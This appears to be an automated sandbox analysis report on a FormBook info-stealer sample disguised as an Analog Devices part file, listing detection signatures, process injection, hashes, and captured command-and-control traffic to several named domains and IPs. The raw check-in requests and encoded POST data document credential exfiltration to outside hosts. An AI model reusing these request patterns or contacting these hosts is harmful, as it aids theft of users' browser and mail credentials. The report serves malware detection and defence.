Edit tour

Windows Analysis Report
3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Overview

General Information

Sample name:	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe
Analysis ID:	1592544
MD5:	6e482564396bb10f5afb4244e505c3e6
SHA1:	9564141dbcedfa4bfc2df6f789db0ab8bbffad99
SHA256:	8fe18e6c77d0b63ad58b669472c8247a8771c82ce4edc65814bb4c53fe5ab51c
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Process Parents

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe" MD5: 6E482564396BB10F5AFB4244E505C3E6)

3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe (PID: 1908 cmdline: "C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe" MD5: 6E482564396BB10F5AFB4244E505C3E6)

cvSKtqilyhlQ.exe (PID: 5856 cmdline: "C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

bitsadmin.exe (PID: 4020 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)

cvSKtqilyhlQ.exe (PID: 5600 cmdline: "C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2044 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3525169174.0000000000C40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2276722825.0000000001600000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3523964569.00000000006A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3525280527.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3525202420.0000000002B80000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2278015136.0000000002520000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe PID: 6900	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Process Parents

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe" , CommandLine: "C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe, NewProcessName: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe, OriginalFileName: C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 4020, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe" , ProcessId: 5600, ProcessName: cvSKtqilyhlQ.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T09:24:00.565719+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49939	47.83.1.90	80	TCP
2025-01-16T09:24:03.041855+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49956	47.83.1.90	80	TCP
2025-01-16T09:24:05.631051+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49976	47.83.1.90	80	TCP
2025-01-16T09:24:16.412186+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50012	149.104.185.93	80	TCP
2025-01-16T09:24:18.972968+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50013	149.104.185.93	80	TCP
2025-01-16T09:24:21.515846+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50014	149.104.185.93	80	TCP
2025-01-16T09:24:30.021258+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50016	172.67.147.28	80	TCP
2025-01-16T09:24:32.589250+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50017	172.67.147.28	80	TCP
2025-01-16T09:24:34.954625+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50018	172.67.147.28	80	TCP
2025-01-16T09:24:52.282078+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50020	199.59.243.228	80	TCP
2025-01-16T09:24:54.825395+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50021	199.59.243.228	80	TCP
2025-01-16T09:24:57.401593+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50022	199.59.243.228	80	TCP
2025-01-16T09:25:05.904207+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50024	68.65.122.71	80	TCP
2025-01-16T09:25:08.795598+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50025	68.65.122.71	80	TCP
2025-01-16T09:25:10.891141+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50026	68.65.122.71	80	TCP
2025-01-16T09:25:19.153213+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50028	209.74.64.189	80	TCP
2025-01-16T09:25:21.705424+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50029	209.74.64.189	80	TCP
2025-01-16T09:25:24.299155+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50030	209.74.64.189	80	TCP
2025-01-16T09:25:33.280094+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50032	160.25.166.123	80	TCP
2025-01-16T09:25:35.816523+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50033	160.25.166.123	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	ReversingLabs: Detection: 42%
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Virustotal: Detection: 45%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525169174.0000000000C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2276722825.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3523964569.00000000006A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3525280527.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3525202420.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3525237052.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278015136.0000000002520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Joe Sandbox ML: detected

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: bitsadmin.pdb source: cvSKtqilyhlQ.exe, 00000006.00000002.3524646475.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bitsadmin.pdbGCTL source: cvSKtqilyhlQ.exe, 00000006.00000002.3524646475.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cvSKtqilyhlQ.exe, 00000006.00000000.2197594264.000000000027E000.00000002.00000001.01000000.0000000C.sdmp, cvSKtqilyhlQ.exe, 00000008.00000002.3523961232.000000000027E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3525550334.000000000317E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2278357152.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3525550334.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2276438628.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000007.00000002.3525550334.000000000317E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2278357152.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3525550334.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000003.2276438628.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\bitsadmin.exe

Code function: 7_2_006BC390 FindFirstFileW,FindNextFileW,FindClose,

7_2_006BC390

Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 4x nop then xor eax, eax		7_2_006A9E90
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_00DE04F8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49976 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49939 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 149.104.185.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 172.67.147.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 149.104.185.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 160.25.166.123:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 149.104.185.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 172.67.147.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 209.74.64.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49956 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 68.65.122.71:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 209.74.64.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 172.67.147.28:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 209.74.64.189:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.lugao.xyz

Source: Joe Sandbox View	IP Address: 160.25.166.123 160.25.166.123
Source: Joe Sandbox View	IP Address: 47.83.1.90 47.83.1.90

Source: Joe Sandbox View	ASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
Source: Joe Sandbox View	ASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /vngz/?BXc8V=BywAvqZrlXCPypxowigGU/RMQqJ+aFEu4r9fzmpnpak2vS64kVBA8ZUuc20d6AYdHHbV7T9IEXhUPkXJmH12l+9kSAAe2W5CHPw/a2fo9vOL4zfBkwpEEo8=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.littlecarseats.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /e4zw/?BXc8V=vBV+S5Q8h7Cl09PJqQteIVoPn0WMDxyCQPiiXTQrjiV2j0wk8nAmuATUOuyLShoOecv/N06oacatEhkR7UdQnNX8vYYfl5KO9EIWGMCepu/511PNPsKoGB8=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /izrj/?f898=D4YHodiH3rXTfZ&BXc8V=j50sR9qwIfHSiYtxTFFp7g89UJFry+rQTe0kZ9YXVPGo3xxAz/jXuWZxuk+F1xvQPOoZdxLEIBdogShtQlOGjR8qYGUmJGoMkDNaZ33tU1jJrtqR7YIPhnQ= HTTP/1.1Host: www.oequ8s1l.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /qixh/?BXc8V=1RMEcCmOa+NBnL2H42a1any5QtiTZ5BG62LeNlaTxkSavmi+Sr/0k147vVBI8c7b7ZvrdBlJEtVahWNDtgmsFIs/6lOYP2MHU69GVvy+6ALSisvzm9a+ML0=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.lugao.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /s76m/?BXc8V=5+vWPd9X0wSWPJRdjPK4htAFucAo2VruY7NWHsZJjc93W8tV5J/CvgfDxHaReh/JOtz7+f35BLAy5HXA0CqVvOWOdVDklARjVuGkQkqqALzufSU8AevfCiY=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.activeusers.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /tt36/?BXc8V=7XRN4ZBNuxsgsz85WwF8d5RVD19EzJb4JnIab8u1JoWwH5zq0g0l+ZcBEWO33waNPxeiCBvzmGaSpdMTI8OJtChGzZiriz+EVcp1nviLXn5OzCwSP0UMhIk=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.rtp189z.latAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Source: global traffic	HTTP traffic detected: GET /6qnn/?BXc8V=jZjCtW5Z35UjZn8TZsrAhfuPzAvLvIn1UqsIYqvINL5GRqKd5l5cN7nY2f+SbBmC2WETDruk6ZGN6IqYT24Zv1a8PLIHAmXFEvfhPzClF16HpP7M54iZiSM=&f898=D4YHodiH3rXTfZ HTTP/1.1Host: www.boldjourn.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1

Source: global traffic	DNS traffic detected: DNS query: www.littlecarseats.shop
Source: global traffic	DNS traffic detected: DNS query: www.givvjn.info
Source: global traffic	DNS traffic detected: DNS query: www.oequ8s1l.vip
Source: global traffic	DNS traffic detected: DNS query: www.lugao.xyz
Source: global traffic	DNS traffic detected: DNS query: www.juiceem.shop
Source: global traffic	DNS traffic detected: DNS query: www.activeusers.tech
Source: global traffic	DNS traffic detected: DNS query: www.rtp189z.lat
Source: global traffic	DNS traffic detected: DNS query: www.boldjourn.website
Source: global traffic	DNS traffic detected: DNS query: www.rpa.asia

Source: unknown

HTTP traffic detected: POST /e4zw/ HTTP/1.1Host: www.givvjn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 202Cache-Control: no-cacheConnection: closeOrigin: http://www.givvjn.infoReferer: http://www.givvjn.info/e4zw/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1Data Raw: 42 58 63 38 56 3d 69 44 39 65 52 4a 70 54 68 35 43 4f 33 74 54 57 38 44 74 58 54 6c 6f 4d 71 45 47 38 61 41 6d 6a 55 2b 65 68 4b 69 30 68 2b 53 49 56 30 48 49 6f 6f 32 6b 4b 68 48 2b 50 4b 2f 43 39 43 53 6f 6e 66 70 32 69 46 6b 71 6f 5a 66 58 6e 4f 56 34 45 31 30 52 75 36 37 58 2f 6f 4b 45 77 68 34 71 6d 36 52 59 43 47 76 7a 63 70 4a 6a 2b 72 68 54 6b 62 2f 53 71 46 67 43 55 4f 52 2f 37 43 2b 48 36 73 46 37 71 48 5a 58 77 6c 65 69 4f 2b 6a 68 41 4c 45 76 6a 37 56 70 74 5a 2f 49 56 30 58 73 4a 58 67 45 65 58 41 79 33 52 42 6f 53 34 67 77 65 6c 6d 79 61 48 4f 6c 63 7a 42 56 56 6d 47 45 31 6c 67 3d 3d Data Ascii: BXc8V=iD9eRJpTh5CO3tTW8DtXTloMqEG8aAmjU+ehKi0h+SIV0HIoo2kKhH+PK/C9CSonfp2iFkqoZfXnOV4E10Ru67X/oKEwh4qm6RYCGvzcpJj+rhTkb/SqFgCUOR/7C+H6sF7qHZXwleiO+jhALEvj7VptZ/IV0XsJXgEeXAy3RBoS4gwelmyaHOlczBVVmGE1lg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 16 Jan 2025 08:23:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4MbgDQZo0FIce232XVSZKN9ZiyI6K4%2BxE9pi7SVT7LknH9vcrR2WYrCmwtGNl4oDkW%2BURt%2B5Z7hxbI8DjH3Ih%2FLoqOwjo9WwHlLKHwmdBTGHI6fZOhXtY6FyUT8gBkw81JkroKYCP1AkGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb48298863b41-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7098&min_rtt=7098&rtt_var=3549&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=488&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 74 74 6c 65 63 61 72 73 65 61 74 73 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 110<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache Server at www.littlecarseats.shop Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 08:24:02 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 08:24:05 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
